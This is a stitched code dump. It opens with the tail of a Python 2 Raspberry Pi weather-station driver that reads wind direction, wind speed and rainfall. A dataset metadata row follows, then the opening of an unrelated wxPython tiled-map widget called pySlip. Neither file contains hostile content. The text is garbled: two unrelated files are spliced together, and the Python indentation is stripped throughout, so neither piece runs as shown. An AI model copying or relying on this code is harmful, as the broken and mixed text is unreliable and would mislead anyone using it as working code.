if (fuzzyCompare(1.98 * ADJUST3OR5, value)):
return 22.5
if (fuzzyCompare(2.25 * ADJUST3OR5, value)):
return 45
if (fuzzyCompare(0.41 * ADJUST3OR5, value)):
return 67.5
if (fuzzyCompare(0.45 * ADJUST3OR5, value)):
return 90.0
if (fuzzyCompare(0.32 * ADJUST3OR5, value)):
return 112.5
if (fuzzyCompare(0.90 * ADJUST3OR5, value)):
return 135.0
if (fuzzyCompare(0.62 * ADJUST3OR5, value)):
return 157.5
if (fuzzyCompare(1.40 * ADJUST3OR5, value)):
return 180
if (fuzzyCompare(1.19 * ADJUST3OR5, value)):
return 202.5
if (fuzzyCompare(3.08 * ADJUST3OR5, value)):
return 225
if (fuzzyCompare(2.93 * ADJUST3OR5, value)):
return 247.5
if (fuzzyCompare(4.62 * ADJUST3OR5, value)):
return 270.0
if (fuzzyCompare(4.04 * ADJUST3OR5, value)):
return 292.5
if (fuzzyCompare(4.34 * ADJUST3OR5, value)): # chart in manufacturers documentation wrong
return 315.0
if (fuzzyCompare(3.43 * ADJUST3OR5, value)):
return 337.5
return defaultWindDirection # return previous value if not found
# return current microseconds
def micros():
microseconds = int(round(time_.time() * 1000000))
return microseconds
class SDL_Pi_WeatherRack:
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
# instance variables
_currentWindCount = 0
_currentRainCount = 0
_shortestWindTime = 0
_pinAnem = 0
_pinRain = 0
_intAnem = 0
_intRain = 0
_ADChannel = 0
_ADMode = 0
_currentRainCount = 0
_currentWindCount = 0
_currentWindSpeed = 0.0
_currentWindDirection = 0.0
_lastWindTime = 0
_shortestWindTime = 0
_sampleTime = 5.0
_selectedMode = SDL_MODE_SAMPLE
_startSampleTime = 0
_currentRainMin = 0
_lastRainTime = 0
_ads1015 = 0
def __init__(self, pinAnem, pinRain, intAnem, intRain, ADMode ):
GPIO.setup(pinAnem, GPIO.IN)
GPIO.setup(pinRain, GPIO.IN)
# when a falling edge is detected on port pinAnem, regardless of whatever
# else is happening in the program, the function callback will be run
#GPIO.add_event_detect(pinAnem, GPIO.RISING, callback=self.serviceInterruptAnem)
#GPIO.add_event_detect(pinRain, GPIO.RISING, callback=self.serviceInterruptRain)
GPIO.add_event_detect(pinAnem, GPIO.RISING, callback=self.serviceInterruptAnem, bouncetime=40 )
GPIO.add_event_detect(pinRain, GPIO.RISING, callback=self.serviceInterruptRain, bouncetime=40 )
ADS1015 = 0x00 # 12-bit ADC
ADS1115 = 0x01 # 16-bit ADC
# Select the gain
self.gain = 6144 # +/- 6.144V
#self.gain = 4096 # +/- 4.096V
# Select the sample rate
self.sps = 250 # 250 samples per second
# Initialise the ADC using the default mode (use default I2C address)
# Set this to ADS1015 or ADS1115 depending on the ADC you are using!
self.ads1015 = ADS1x15(ic=ADS1015, address=0x48)
# determine if device present
try:
value = self.ads1015.readRaw(1, self.gain, self.sps) # AIN1 wired to wind vane on WeatherPiArduino
time_.sleep(1.0)
value = self.ads1015.readRaw(1, self.gain, self.sps) # AIN1 wired to wind vane on WeatherPiArduino
# now figure out if it is an ADS1015 or ADS1115
if ((0x0F & value) == 0):
config.ADS1015_Present = True
config.ADS1115_Present = False
# check again (1 out 16 chance of zero)
value = self.ads1015.readRaw(0, self.gain, self.sps) # AIN1 wired to wind vane on WeatherPiArduino
if ((0x0F & value) == 0):
config.ADS1015_Present = True
config.ADS1115_Present = False
else:
config.ADS1015_Present = False
config.ADS1115_Present = True
self.ads1015 = ADS1x15(ic=ADS1115, address=0x48)
else:
config.ADS1015_Present = False
config.ADS1115_Present = True
self.ads1015 = ADS1x15(ic=ADS1115, address=0x48)
except TypeError as e:
print "Type Error"
config.ADS1015_Present = False
config.ADS1115_Present = False
SDL_Pi_WeatherRack._ADMode = ADMode
# Wind Direction Routines
def current_wind_direction(self):
if (SDL_Pi_WeatherRack._ADMode == SDL_MODE_I2C_ADS1015):
value = self.ads1015.readADCSingleEnded(1, self.gain, self.sps) # AIN1 wired to wind vane on WeatherPiArduino
voltageValue = value/1000
else:
# user internal A/D converter
voltageValue = 0.0
direction = voltageToDegrees(voltageValue, SDL_Pi_WeatherRack._currentWindDirection)
return direction;
def current_wind_direction_voltage(self):
if (SDL_Pi_WeatherRack._ADMode == SDL_MODE_I2C_ADS1015):
value = self.ads1015.readADCSingleEnded(1, self.gain, self.sps) # AIN1 wired to wind vane on WeatherPiArduino
voltageValue = value/1000
else:
# user internal A/D converter
voltageValue = 0.0
return voltageValue
# Utility methods
def reset_rain_total(self):
SDL_Pi_WeatherRack._currentRainCount = 0;
def accessInternalCurrentWindDirection(self):
return SDL_Pi_WeatherRack._currentWindDirection;
def reset_wind_gust(self):
SDL_Pi_WeatherRack._shortestWindTime = 0xffffffff;
def startWindSample(self, sampleTime):
SDL_Pi_WeatherRack._startSampleTime = micros();
SDL_Pi_WeatherRack._sampleTime = sampleTime;
# get current wind
def get_current_wind_speed_when_sampling(self):
compareValue = SDL_Pi_WeatherRack._sampleTime*1000000;
if (micros() - SDL_Pi_WeatherRack._startSampleTime >= compareValue):
# sample time exceeded, calculate currentWindSpeed
timeSpan = (micros() - SDL_Pi_WeatherRack._startSampleTime);
SDL_Pi_WeatherRack._currentWindSpeed = (float(SDL_Pi_WeatherRack._currentWindCount)/float(timeSpan)) * WIND_FACTOR*1000000.0
#print "SDL_CWS = %f, SDL_Pi_WeatherRack._shortestWindTime = %i, CWCount=%i TPS=%f" % (SDL_Pi_WeatherRack._currentWindSpeed,SDL_Pi_WeatherRack._shortestWindTime, SDL_Pi_WeatherRack._currentWindCount, float(SDL_Pi_WeatherRack._currentWindCount)/float(SDL_Pi_WeatherRack._sampleTime))
SDL_Pi_WeatherRack._currentWindCount = 0
SDL_Pi_WeatherRack._startSampleTime = micros()
#print "SDL_Pi_WeatherRack._currentWindSpeed=", SDL_Pi_WeatherRack._currentWindSpeed
return SDL_Pi_WeatherRack._currentWindSpeed
def setWindMode(self, selectedMode, sampleTime): # time in seconds
SDL_Pi_WeatherRack._sampleTime = sampleTime;
SDL_Pi_WeatherRack._selectedMode = selectedMode;
if (SDL_Pi_WeatherRack._selectedMode == SDL_MODE_SAMPLE):
self.startWindSample(SDL_Pi_WeatherRack._sampleTime);
#def get current values
def get_current_rain_total(self):
rain_amount = 0.2794 * float(SDL_Pi_WeatherRack._currentRainCount)/SDL_RAIN_BUCKET_CLICKS
SDL_Pi_WeatherRack._currentRainCount = 0;
return rain_amount;
def current_wind_speed(self): # in milliseconds
if (SDL_Pi_WeatherRack._selectedMode == SDL_MODE_SAMPLE):
SDL_Pi_WeatherRack._currentWindSpeed = self.get_current_wind_speed_when_sampling();
else:
# km/h * 1000 msec
SDL_Pi_WeatherRack._currentWindCount = 0;
delay(SDL_Pi_WeatherRack._sampleTime*1000);
SDL_Pi_WeatherRack._currentWindSpeed = (float(SDL_Pi_WeatherRack._currentWindCount)/float(SDL_Pi_WeatherRack._sampleTime)) * WIND_FACTOR;
return SDL_Pi_WeatherRack._currentWindSpeed;
def get_wind_gust(self):
latestTime =SDL_Pi_WeatherRack._shortestWindTime;
SDL_Pi_WeatherRack._shortestWindTime=0xffffffff;
time=latestTime/1000000.0; # in microseconds
if (time == 0):
return 0
else:
return (1.0/float(time))*WIND_FACTOR;
# Interrupt Routines
def serviceInterruptAnem(self,channel):
#print "Anem Interrupt Service Routine"
currentTime= (micros()-SDL_Pi_WeatherRack._lastWindTime);
SDL_Pi_WeatherRack._lastWindTime=micros();
if(currentTime>4000): # debounce
SDL_Pi_WeatherRack._currentWindCount = SDL_Pi_WeatherRack._currentWindCount+1
if(currentTime<SDL_Pi_WeatherRack._shortestWindTime):
SDL_Pi_WeatherRack._shortestWindTime=currentTime;
else:
print "currentTime=%i"%currentTime
print "DEBOUNCE-count=%i" % SDL_Pi_WeatherRack._currentWindCount
def serviceInterruptRain(self,channel):
print "Rain Interrupt Service Routine"
currentTime=(micros()-SDL_Pi_WeatherRack._lastRainTime);
SDL_Pi_WeatherRack._lastRainTime=micros();
if(currentTime>500): # debounce
SDL_Pi_WeatherRack._currentRainCount = SDL_Pi_WeatherRack._currentRainCount+1
if(currentTime<SDL_Pi_WeatherRack._currentRainMin):
SDL_Pi_WeatherRack._currentRainMin=currentTime;
def returnInterruptClicks(self):
return SDL_INTERRUPT_CLICKS
| 26.829082 | 286 | 0.721689 |
9056942a9a4d1e2c190f46b76d564de2f7b0a336 | 101,119 | py | Python | rstbx/slip_viewer/pyslip.py | rimmartin/cctbx_project | 644090f9432d9afc22cfb542fc3ab78ca8e15e5d | [
"BSD-3-Clause-LBNL"
] | null | null | null | rstbx/slip_viewer/pyslip.py | rimmartin/cctbx_project | 644090f9432d9afc22cfb542fc3ab78ca8e15e5d | [
"BSD-3-Clause-LBNL"
] | null | null | null | rstbx/slip_viewer/pyslip.py | rimmartin/cctbx_project | 644090f9432d9afc22cfb542fc3ab78ca8e15e5d | [
"BSD-3-Clause-LBNL"
] | null | null | null | # -*- mode: python; coding: utf-8; indent-tabs-mode: nil; python-indent: 2 -*-
#
# $Id$
"""
A 'slippy map' widget for wxPython.
So why is this widget called 'pySlip'?
Well, in the OpenStreetMap world[1], a 'slippy map' is a browser map view
served by a tile server that can be panned and zoomed in the same way as
popularised by Google maps. Such a map feels 'slippery', I guess.
Rather than 'slippy' I went for the slightly more formal 'pySlip' since the
thing is written in Python and therefore must have the obligatory 'py' prefix.
Even though this was originally written for a geographical application, the
underlying system only assumes a cartesian 2D coordinate system. So pySlip
could be used to present a game map, 2D CAD view, or whatever. The major
difficulty for most uses is to generate the map tiles.
[1] http://wiki.openstreetmap.org/index.php/Slippy_Map
"""
from __future__ import division
from six.moves import range
# Copyright (c) 2010, Ross Wilson (rzzzwilson@gmail.com). All rights reserved.
#
# Redistribution and use in source and binary forms, with or
# without modification, are permitted provided that the following conditions
# are met:
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import os
import sys
import glob
from six.moves import cPickle as pickle
import wx
from scitbx.matrix import col
import math
# if we don't have log.py, don't crash
try:
import log
log = log.Log('pyslip.log', log.Log.DEBUG)
except Exception:
def log(*args, **kwargs):
pass
__version__ = '2.2'
__all__ = ['PySlip']
WX3 = wx.VERSION[0] == 3
# type of SELECT events
EventPointSelect = 0
EventBoxSelect = 1
EventRightPointSelect = 2
EventRightBoxSelect = 3
######
# utility routines.
######
def point_inside_polygon(x, y, poly):
"""Decide if point is inside polygon.
x x coord of point in question
y y coord of point in question
poly polygon in form [(x1,y1), (x2,y2), ...]
Returns True if point is properly inside polygon.
May return True or False if point on edge of polygon.
Slightly modified version of the 'published' algorithm found on the 'net.
Instead of indexing into the poly, create a new poly that 'wraps around'.
Even with the extra code, it runs in 2/3 the time.
"""
l_poly = list(poly)
new_poly = l_poly[:]
new_poly.append(l_poly[0])
inside = False
(p1x, p1y) = new_poly[0]
for (p2x, p2y) in new_poly:
if y > min(p1y, p2y):
if y <= max(p1y, p2y):
if x <= max(p1x, p2x):
if p1y != p2y:
xinters = (y-p1y)*(p2x-p1x)/(p2y-p1y) + p1x
if p1x == p2x or x <= xinters:
inside = not inside
(p1x, p1y) = (p2x, p2y)
return inside
######
# Base class for the widget canvas - buffered and flicker-free.
######
class _BufferedCanvas(wx.Panel):
"""Implements a buffered, flicker-free canvas widget.
This class is based on:
http://wiki.wxpython.org/index.cgi/BufferedCanvas
"""
# The backing buffer
buffer = None
def __init__(self, parent, id=wx.ID_ANY, pos=wx.DefaultPosition,
size=wx.DefaultSize, style=wx.NO_FULL_REPAINT_ON_RESIZE):
"""Initialize the canvas.
parent reference to 'parent' widget
id the unique widget ID
pos canvas position
size canvas size
style wxPython style
"""
wx.Panel.__init__(self, parent, id, pos, size, style)
# Bind events
self.Bind(wx.EVT_PAINT, self.OnPaint)
self.Bind(wx.EVT_SIZE, self.OnSize)
# Disable background erasing (flicker-licious)
def disable_event(*pargs, **kwargs):
pass # the sauce, please
self.Bind(wx.EVT_ERASE_BACKGROUND, disable_event)
# set callback upon onSize event
self.onSizeCallback = None
def Draw(self, dc):
"""Stub: called when the canvas needs to be re-drawn."""
pass
def Update(self):
"""Causes the canvas to be updated."""
dc = wx.BufferedDC(wx.ClientDC(self), self.buffer)
if WX3:
dc.BeginDrawing()
dc.Clear()
self.Draw(dc)
if WX3:
dc.EndDrawing()
def OnPaint(self, event):
"""Paint the canvas to the screen."""
# Blit the front buffer to the screen
wx.BufferedPaintDC(self, self.buffer)
def OnSize(self, event=None):
"""Create a new off-screen buffer to hold drawn data."""
(width, height) = self.GetClientSizeTuple() if WX3 else self.GetClientSize()
if width == 0:
width = 1
if height == 0:
height = 1
self.buffer = wx.EmptyBitmap(width, height)
self.view_width = width
self.view_height = height
# call onSize callback, if registered
if self.onSizeCallback:
self.onSizeCallback()
# Now update the screen
self.Update()
######
# Base class for a tile object - handles access to tiles.
######
class _Tiles(object):
"""An object to handle a pyslip tiles directory.
Uses 'elephant' caching - it never forgets!
TODO: Add more sophisticated limit + 'drop LRU' caching.
"""
# the name of the tile info file (under the main tile dir)
TileInfoFilename = 'tile.info'
# expected form of individual tile level directories (2 decimal digits)
TileFilenameTemplate = '[0-9][0-9]'
# name of picture file to use if tile missing (under the main tile dir)
MissingTileFilename = 'missing_tile.png'
# maximum number of tiles held in each level cache
MaxTileList = 4096
def __init__(self, tile_dir):
"""Initialise a Tiles instance.
tile_dir root directory of tiles
"""
# open top-level info file
self.tile_dir = tile_dir
info_file = os.path.join(tile_dir, self.TileInfoFilename)
try:
fd = open(info_file, 'rb')
(self.extent, self.tile_size,
self.sea_colour, self.land_colour) = pickle.load(fd)
fd.close()
except IOError:
msg = "'%s' doesn't appear to be a tile directory" % tile_dir
raise Exception(msg)
(self.tile_size_x, self.tile_size_y) = self.tile_size
# get list of tile levels
tile_mask = os.path.join(tile_dir, self.TileFilenameTemplate)
self.levels = [int(os.path.basename(l))
for l in glob.glob(os.path.join(tile_mask))]
# setup the tile caches and LRU lists
self.cache = {}
self.lru = {}
for l in self.levels:
self.cache[l] = {}
self.lru[l] = []
self.missing_tile = None
# set min and max tile levels
self.min_level = min(self.levels)
self.max_level = max(self.levels)
def UseLevel(self, n):
"""Prepare to serve tiles from the required level.
n The required level
Returns a tuple (map_width, map_height, ppd_x, ppd_y) if succesful,
else None. The width/height values are pixels. The ppd_? values are
pixels-per-degree values for X and Y direction.
"""
# try to get cache for this level, no cache means no level
try:
self.tile_cache = self.cache[n]
self.tile_list = self.lru[n]
except KeyError:
return None
# get tile info
info = self.GetInfo(n)
if info is None:
return None
(self.num_tiles_x, self.num_tiles_y, self.ppd_x, self.ppd_y) = info
# store partial path to level dir
self.tile_level_dir = os.path.join(self.tile_dir, '%02d' % n)
return (self.tile_size_x * self.num_tiles_x,
self.tile_size_y * self.num_tiles_y,
self.ppd_x, self.ppd_y)
def GetInfo(self, level):
"""Get tile info for a particular level.
level the level to get tile info for
Returns (num_tiles_x, num_tiles_y, ppd_x, ppd_y).
"""
# see if we can open the tile info file.
info_file = os.path.join(self.tile_dir, '%02d' % level,
self.TileInfoFilename)
try:
fd = open(info_file, 'rb')
except IOError:
return None
# OK, looks like we actually do have this level!
info = pickle.load(fd)
fd.close()
return info
def GetTile(self, x, y):
"""Get bitmap for tile at tile coords (x, y).
x X coord of tile required (tile coordinates)
y Y coord of tile required (tile coordinates)
Returns bitmap object containing the tile image.
Tile coordinates are measured from map top-left.
If tile is in cache, read from there, else read from file & put
into cache. Use LRU cache algorithm to limit memory usage.
"""
try:
# if tile in cache, return it from there
pic = self.tile_cache[(x, y)]
index = self.tile_list.index((x, y))
del self.tile_list[index]
except KeyError:
# tile *not* in cache: get image, cache and return it
img_name = os.path.join(self.tile_level_dir,
'tile_%d_%d.png' % (x, y))
# load tile as not in cache
if not os.path.exists(img_name):
# tile not there, use 'missing tile'
if not self.missing_tile:
# load missing tile
img_name = os.path.join(self.tile_dir,
self.MissingTileFilename)
img = wx.Image(img_name, wx.BITMAP_TYPE_ANY)
self.missing_tile = img.ConvertToBitmap()
pic = self.missing_tile
else:
# new tile, check if we must drop old tiles - LRU
# remove oldest index at last element, then delete from dict
if len(self.tile_list) > self.MaxTileList:
drop_element = self.tile_list.pop()
del self.tile_cache[drop_element]
# we have the tile file - read into memory, cache & return
img = wx.Image(img_name, wx.BITMAP_TYPE_ANY)
pic = img.ConvertToBitmap()
self.tile_cache[(x, y)] = pic
self.tile_list.insert(0, (x, y))
return pic
######
# A layer class - encapsulates all layer data.
######
class _Layer(object):
"""A Layer object."""
DefaultDelta = 5 # default selection delta
def __init__(self, id=0, painter=None, data=None, map_rel=True,
visible=False, show_levels=None, selectable=False,
name="<no name given>", type=None):
"""Initialise the Layer object.
id unique layer ID
painter render function
data the layer data
map_rel True if layer is map-relative, else layer-relative
visible layer visibility
show_levels list of levels at which to auto-show the level
selectable True if select operates on this layer, Else False
name the name of the layer (for debug)
type a layer 'type' flag
"""
self.painter = painter # routine to draw layer
self.data = data # data that defined the layer
self.map_rel = map_rel # True if layer is map relative
self.visible = visible # True if layer visible
self.show_levels = show_levels # None or list of levels to auto-show
self.selectable = selectable # True if we can select on this layer
self.delta = self.DefaultDelta # minimum distance for selection
self.name = name # name of this layer
self.type = type # type of layer
self.id = id # ID of this layer
def __str__(self):
return ('<pyslip Layer: id=%d, name=%s, map_rel=%s, visible=%s'
% (self.id, self.name, str(self.map_rel), str(self.visible)))
###############################################################################
# A Resource class that abstracts loading/storing resources from/to disk.
###############################################################################
class Resource(object):
"""A class to allow the loading of layer data to/from disk as a resource.
An instance of Resource has the following attributes/methods:
.layers a dictionary of named Layer objects
.AddLayer() add a layer to the resource
.GetLayer() get a layer resource by name and type
.Read() read a resource from disk
.Write() write resource to disk
"""
def __init__(self, fname=None):
"""Initialise a Resource object, optionally loading data from disk.
fname path to a resource file to read
"""
# set default attributes
self.layers = {}
self.filename = fname
if fname:
self.Read(fname)
def Read(self, fname):
"""Read a resource from disk.
fname path to file to read
fname overwrites self.filename.
"""
self.filename = fname
try:
import json
self.layers = json.load(open(fname))
except IOError as e:
msg = 'Error opening %s: %s' % (fname, str(e))
raise IOError(msg)
def Write(self, fname=None):
"""Write the Resource to disk.
fname path to file to write (default is load self.filename)
If fname is supplied, it overwrites self.filename.
"""
if fname:
self.filename = fname
if not self.filename:
raise Exception('Write() called but no filename supplied')
import json
json.dump(self.layers, open(self.filename, 'wb'), ensure_ascii=False,
indent=2, separators=(',', ':'))
def AddLayer(self, name, layer_type, data):
"""Add a layer to the Resource.
name name of the layer
layer_type type of the layer
data layer data
"""
self.layers[name] = (layer_type, data)
def GetLayers(self):
"""Get layers object.
Returns a dict: {'layer_name': <layer_data>, ...}
"""
return self.layers
def GetLayer(self, name):
"""Get a layer by name.
name name of the layer to get
Returns a tuple (layer_type, data), or None if not found.
"""
return self.layers.get(name, None)
def DeleteLayer(self, name):
"""Delete a layer by name.
name name of the layer to delete
"""
try:
del self.layers[name]
except KeyError:
pass
def __len__(self):
"""Makes len(Resource) return number of layers held."""
return len(self.layers)
###############################################################################
# The wxPython pySlip widget events.
# define the events that are raised by the pySlip widget
###############################################################################
# point/box select
_myEVT_PYSLIP_SELECT = wx.NewEventType()
EVT_PYSLIP_SELECT = wx.PyEventBinder(_myEVT_PYSLIP_SELECT, 1)
# point RIGHT select
_myEVT_PYSLIP_RIGHTSELECT = wx.NewEventType()
EVT_PYSLIP_RIGHTSELECT = wx.PyEventBinder(_myEVT_PYSLIP_RIGHTSELECT, 1)
# level change
_myEVT_PYSLIP_LEVEL = wx.NewEventType()
EVT_PYSLIP_LEVEL = wx.PyEventBinder(_myEVT_PYSLIP_LEVEL, 1)
# mouse geo position change
_myEVT_PYSLIP_POSITION = wx.NewEventType()
EVT_PYSLIP_POSITION = wx.PyEventBinder(_myEVT_PYSLIP_POSITION, 1)
class _PySlipEvent(wx.PyCommandEvent):
"""Event sent from the pySlip widget."""
def __init__(self, eventType, id):
"""Construct a PySlip event.
eventType type of event
id unique event number
Event will be adorned with attributes by raising code.
"""
wx.PyCommandEvent.__init__(self, eventType, id)
###############################################################################
# The wxPython pySlip widget proper
###############################################################################
class PySlip(_BufferedCanvas):
"""A widget to display a tiled map, a la Google maps."""
# keep a temporary list of placement dictionaries for later compilation
placements = []
# dictionary for map-relative image placement
# assumes variables x, y, w, h, w2, h2, x_off & y_off are set
# perturbs x and y to top-left image corner for placing
image_map_placement = {'cc': 'x=x-w2+x_off; y=y-h2+y_off',
'nw': 'x=x+x_off; y=y+y_off',
'cn': 'x=x-w2+x_off; y=y+y_off',
'ne': 'x=x-w+x_off; y=y+y_off',
'ce': 'x=x-w+x_off; y=y-h2+y_off',
'se': 'x=x-w+x_off; y=y-h+y_off',
'cs': 'x=x-w2+x_off; y=y-h+y_off',
'sw': 'x=x+x_off; y=y-h+y_off',
'cw': 'x=x+x_off; y=y-h2+y_off'}
placements.append(image_map_placement)
# dictionary for view-relative image placement
# assumes variables x, y, w, h, dc_w, dc_h, x_off, y_off are set
# perturbs x and y to top-left image corner for drawing
image_view_placement = {'cc': 'x=dc_w2-w2; y=dc_h2-h2',
'nw': 'x=x_off; y=y_off',
'cn': 'x=dc_w2-w2; y=y_off',
'ne': 'x=dc_w-w-x_off; y=y_off',
'ce': 'x=dc_w-w-x_off; y=dc_h2-h2',
'se': 'x=dc_w-w-x_off; y=dc_h-h-y_off',
'cs': 'x=dc_w2-w2; y=dc_h-h-y_off',
'sw': 'x=x_off; y=dc_h-h-y_off',
'cw': 'x=x_off; y=dc_h2-h2'}
placements.append(image_view_placement)
# map-relative text placement dictionary
# assumes variables x, y, w, h, dc_w, dc_h, x_off, y_off are set
# w and h are text width and height
# perturbs x and y to correct values for the placement
text_map_placement = {'cc': 'x=x-w2; y=y-h2',
'nw': 'x=x+x_off; y=y+y_off',
'cn': 'x=x-w2; y=y+y_off',
'ne': 'x=x-w-x_off; y=y+y_off',
'ce': 'x=x-w-x_off; y=y-h2',
'se': 'x=x-w-x_off; y=y-h-y_off',
'cs': 'x=x-w2; y=y-h-y_off',
'sw': 'x=x+x_off; y=y-h-y_off',
'cw': 'x=x+x_off; y=y-h2'}
placements.append(text_map_placement)
# view-relative text placement dictionary
# assumes variables x, y, w, h, dc_w, dc_h, x_off, y_off are set
# w and h are text width and height
# perturbs x and y to correct values for the placement
text_view_placement = {'cc': 'x=x+dc_w2-w2; y=y+dc_h2-h2',
'nw': 'x=x; y=y',
'cn': 'x=x+dc_w2-w2; y=y',
'ne': 'x=x+dc_w-w; y=y',
'ce': 'x=x+dc_w-w; y=y+dc_h2-h2',
'se': 'x=x+dc_w-w; y=y+dc_h-h',
'cs': 'x=x+dc_w2-w2; y=y+dc_h-h',
'sw': 'x=x; y=y+dc_h-h',
'cw': 'x=x; y=y+dc_h2-h2'}
placements.append(text_view_placement)
# view-relative polygon placement dictionary
# assumes variables x, y, dc_w, dc_h, x_off, y_off are set
# perturbs x and y to correct values for the placement
poly_view_placement = {'cc': 'x=x+dc_w2; y=y+dc_h2',
'nw': 'x=x+x_off; y=y+y_off',
'cn': 'x=x+dc_w2; y=y+y_off',
'ne': 'x=x+dc_w-x_off; y=y+y_off',
'ce': 'x=x+dc_w-x_off; y=y+dc_h2-y_off',
'se': 'x=x+dc_w-x_off; y=y+dc_h-y_off',
'cs': 'x=x+dc_w2; y=y+dc_h-y_off',
'sw': 'x=x+x_off; y=y+dc_h-y_off',
'cw': 'x=x+x_off; y=y+dc_h2'}
placements.append(poly_view_placement)
# dictionary for view-relative point placement
# assumes variables x, y, dc_w, dc_h, x_off, y_off are set
# perturbs x and y to point centre for drawing
point_view_placement = {'cc': 'x=x+dc_w2; y=y+dc_h2',
'nw': 'x=x+x_off; y=y+y_off',
'cn': 'x=x+dc_w2; y=y+y_off',
'ne': 'x=x+dc_w-x_off; y=y+y_off',
'ce': 'x=x+dc_w-x_off; y=y+dc_h2',
'se': 'x=x+dc_w-x_off; y=y+dc_h-y_off',
'cs': 'x=x+dc_w2; y=y+dc_h-y_off',
'sw': 'x=x+x_off; y=y+dc_h-y_off',
'cw': 'x=x+x_off; y=y+dc_h2'}
placements.append(point_view_placement)
# now pre-compile all the placement string dictionaries
for p_dict in placements:
for key in p_dict:
p_dict[key] = compile(p_dict[key], 'string', 'exec')
del placements
# panel background colour
BackgroundColour = wx.WHITE
# default text attributes - map relative
DefaultTextPlacement = 'se'
DefaultTextRadius = 2
DefaultTextColour = wx.BLACK
DefaultTextTextColour = wx.BLACK
DefaultTextOffsetX = 5
DefaultTextOffsetY = 1
DefaultTextFontname = 'ArialMT'
DefaultTextFontSize = 9
DefaultTextData = None
# default text attributes - view relative
DefaultTextViewPlacement = 'se'
DefaultTextViewRadius = 0
DefaultTextViewColour = wx.BLACK
DefaultTextViewTextColour = wx.BLACK
DefaultTextViewOffsetX = 0
DefaultTextViewOffsetY = 0
DefaultTextViewFontname = 'ArialMT'
DefaultTextViewFontSize = 9
DefaultTextViewData = None
# default point attributes
DefaultPointPlacement = 'nw'
DefaultPointRadius = 3
DefaultPointColour = wx.RED
DefaultPointOffsetX = 0
DefaultPointOffsetY = 0
DefaultPointData = None
# default image attributes
DefaultImagePlacement = 'cc'
DefaultImageRadius = 0
DefaultImageColour = wx.BLACK
DefaultImageOffsetX = 0
DefaultImageOffsetY = 0
# default polygon attributes
DefaultPolygonPlacement = 'cc'
DefaultPolygonWidth = 1
DefaultPolygonColour = wx.RED
DefaultPolygonClose = False
DefaultPolygonFilled = False
DefaultPolygonFillcolour = 'blue'
DefaultPolygonOffsetX = 0
DefaultPolygonOffsetY = 0
# layer type values
TypePoint = 0
TypeImage = 1
TypePolygon = 2
TypeText = 3
TypeEllipse = 4
def __init__(self, parent, tile_dir=None, start_level=None,
min_level=None, max_level=None, **kwargs):
"""Initialise a pySlip instance.
parent reference to parent object
tile_dir the root tile directory
start_level initial tile level to start at
min_level the minimum tile level to use
max_level the maximum tile level to use
**kwargs keyword args for Panel
"""
# create and initialise the base panel
_BufferedCanvas.__init__(self, parent=parent, **kwargs)
self.SetBackgroundColour(PySlip.BackgroundColour)
# get tile info
self.tiles = _Tiles(tile_dir)
if max_level:
self.max_level = max_level
else:
self.max_level = self.tiles.max_level
if min_level:
self.min_level = min_level
else:
self.min_level = self.tiles.min_level
if start_level:
self.level = start_level
else:
self.level = self.min_level
self.tile_size_x = self.tiles.tile_size_x
self.tile_size_y = self.tiles.tile_size_y
# set some internal state
self.view_width = None # view size in pixels
self.view_height = None
self.ppd_x = 0 # pixel_per_degree for current tileset
self.ppd_y = 0
self.view_offset_x = 0 # pixel offset at left & top of view
self.view_offset_y = 0
self.NS_wrap = False # disallow wraparound N-S
self.EW_wrap = False # disallow wraparound E-W
self.view_llon = self.view_rlon = None # view limits
self.view_tlat = self.view_blat = None
self.was_dragging = False # True if dragging map
self.move_dx = 0 # drag delta values
self.move_dy = 0
self.last_drag_x = None # previous drag position
self.last_drag_y = None
self.ignore_next_up = False # ignore next LEFT UP event
self.ignore_next_right_up = False # ignore next RIGHT UP event
self.is_box_select = False # True if box selection
self.sbox_1_x = self.sbox_1_y = None # box size
# layer stuff
self.next_layer_id = 1 # source of unique layer IDs
self.layer_z_order = [] # layer Z order, contains layer IDs
self.layer_mapping = {} # maps layer ID to layer data
# True if we send event to report mouse position in view
self.mouse_position_event = True
# True if event on right mouse click (right button up event)
self.right_click_event = False
# True if we send event on level change
self.change_level_event = True
# set up dispatch dictionary for layer select handlers
# for point select
self.layerPSelHandler = {self.TypePoint: self.GetNearestPointInLayer,
self.TypeImage: self.GetNearestImageInLayer,
self.TypePolygon:
self.GetNearestPolygonInLayer,
self.TypeText: self.GetNearestTextInLayer}
# for box select
self.layerBSelHandler = {self.TypePoint: self.GetBoxSelPointsInLayer,
self.TypeImage: self.GetBoxSelImagesInLayer,
self.TypePolygon:
self.GetBoxSelPolygonsInLayer,
self.TypeText: self.GetBoxSelTextsInLayer}
# bind event handlers
self.Bind(wx.EVT_MOTION, self.OnMove)
self.Bind(wx.EVT_LEFT_DOWN, self.OnLeftDown)
self.Bind(wx.EVT_LEFT_DCLICK, self.OnLeftDClick)
self.Bind(wx.EVT_LEFT_UP, self.OnLeftUp)
self.Bind(wx.EVT_MIDDLE_DOWN, self.OnMiddleDown)
self.Bind(wx.EVT_MIDDLE_UP, self.OnMiddleUp)
self.Bind(wx.EVT_RIGHT_DOWN, self.OnRightDown)
self.Bind(wx.EVT_RIGHT_DCLICK, self.OnRightDClick)
self.Bind(wx.EVT_RIGHT_UP, self.OnRightUp)
